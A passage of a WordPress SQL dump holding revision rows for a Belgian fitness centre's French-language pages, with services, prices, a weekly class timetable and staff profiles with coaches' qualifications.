outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:58:05', '2013-07-03 17:58:05', '', 11, 'http://www.crosstrainingcenter.be/?p=205', 0, 'revision', '', 0),
(126, 1, '2013-06-16 14:39:01', '2013-06-16 14:39:01', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:39:01', '2013-06-16 14:39:01', '', 11, 'http://www.crosstrainingcenter.be/?p=126', 0, 'revision', '', 0),
(127, 1, '2013-06-16 14:44:31', '2013-06-16 14:44:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:44:31', '2013-06-16 14:44:31', '', 11, 'http://www.crosstrainingcenter.be/?p=127', 0, 'revision', '', 0),
(128, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', 'blabla', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 20, 'http://www.crosstrainingcenter.be/?p=128', 0, 'revision', '', 0),
(129, 1, '2013-06-16 14:50:56', '2013-06-16 14:50:56', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 14:50:56', '2013-06-16 14:50:56', '', 20, 'http://www.crosstrainingcenter.be/?p=129', 0, 'revision', '', 0),
(130, 1, '2013-06-16 14:55:43', '2013-06-16 14:55:43', '', 'rg', '', 'inherit', 'open', 'open', '', 'rg', '', '', '2013-06-16 14:55:43', '2013-06-16 14:55:43', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg', 0, 'attachment', 'image/jpeg', 0),
(131, 1, '2015-04-21 09:33:20', '2015-04-21 09:33:20', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Julie Pierrard</h2>\n<h5>Gérante\nCoach\nDiététicienne</h5>\n<ul>\n	<li>Baccalauréat en diététique</li>\n	<li>Spécialisation en diététique du sport</li>\n	<li>Enseignante en éducation nutritionnelle</li>\n	<li>Pratiquante de judo, natation et cyclisme</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Damien Pierrard</h2>\n<h5>Fondateur Pierrard Sports\nFormateur coach\nCoach</h5>\n<ul>\n	<li>LesMills Coach</li>\n	<li>Licence en éducation physique</li>\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\n	<li>Préparateur physique</li>\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Youssra Boujat</h2>\n<h5>Instructeur de Zumba Fitness</h5>\n<ul>\n	<li>Etudiante infirmière à l\'HENALLUX</li>\n	<li>Basketteuse au Belfius Namur Capital</li>\n	<li>Pratiquante de courses à pieds et de fitness</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Matthieu Gille</h2>\n<h5>Coach</h5>\n<ul>\n	<li>Préparateur physique en sport collectif et individuel</li>\n	<li>Brevet A de l’URBSFA</li>\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Bertrand Bauwin</h2>\n<h5>Coach</h5>\n<ul>\n	<li>Baccalauréat en éducation physique</li>\n	<li>Spécialisation en psychomotricité</li>\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\n	<li>Enseignant en éducation physique</li>\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Julien Meulemans</h2>\n<h5>Coach</h5>\n<ul>\n	<li>Baccalauréat en éducation physique</li>\n	<li>Maitre psychomotricien</li>\n	<li>Formation de personal trainer</li>\n	<li>Formation en Streching Global Actif (SGA)</li>\n	<li>Formation à l’initiation au golf et snag golf</li>\n	<li>Enseignant en éducation physique</li>\n	<li>Pratiquant de foot et de ski</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Chloé Chmiel</h2>\n<h5>Coach</h5>\n<ul>\n	<li>Master en kinésithérapie</li>\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\n	<li>Kiné Nat.3 basket de Belgrade</li>\n	<li>Pratiquante de course à pied et danses sportives</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\"></td>\n</tr>\n</tbody>\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-autosave-v1', '', '', '2015-04-21 09:33:20', '2015-04-21 09:33:20', '', 20, 'http://www.crosstrainingcenter.be/?p=131', 0, 'revision', '', 0),
(132, 1, '2013-06-16 14:55:32', '2013-06-16 14:55:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 14:55:32', '2013-06-16 14:55:32', '', 20, 'http://www.crosstrainingcenter.be/?p=132', 0, 'revision', '', 0),
(136, 1, '2013-06-16 15:00:45', '2013-06-16 15:00:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne<br><br><br></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:00:45', '2013-06-16 15:00:45', '', 20, 'http://www.crosstrainingcenter.be/?p=136', 0, 'revision', '', 0),
(133, 1, '2013-06-16 14:57:50', '2013-06-16 14:57:50', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2 class=\"arrondi\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a>Julie Pierrard</h2>\r\nGérante\r\n\r\nCoatch\r\n\r\nDiététicienne</td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 14:57:50', '2013-06-16 14:57:50', '', 20, 'http://www.crosstrainingcenter.be/?p=133', 0, 'revision', '', 0),
(134, 1, '2013-06-16 14:59:12', '2013-06-16 14:59:12', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<h2 class=\"arrondi\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 14:59:12', '2013-06-16 14:59:12', '', 20, 'http://www.crosstrainingcenter.be/?p=134', 0, 'revision', '', 0),
(135, 1, '2013-06-16 15:00:22', '2013-06-16 15:00:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:00:22', '2013-06-16 15:00:22', '', 20, 'http://www.crosstrainingcenter.be/?p=135', 0, 'revision', '', 0),
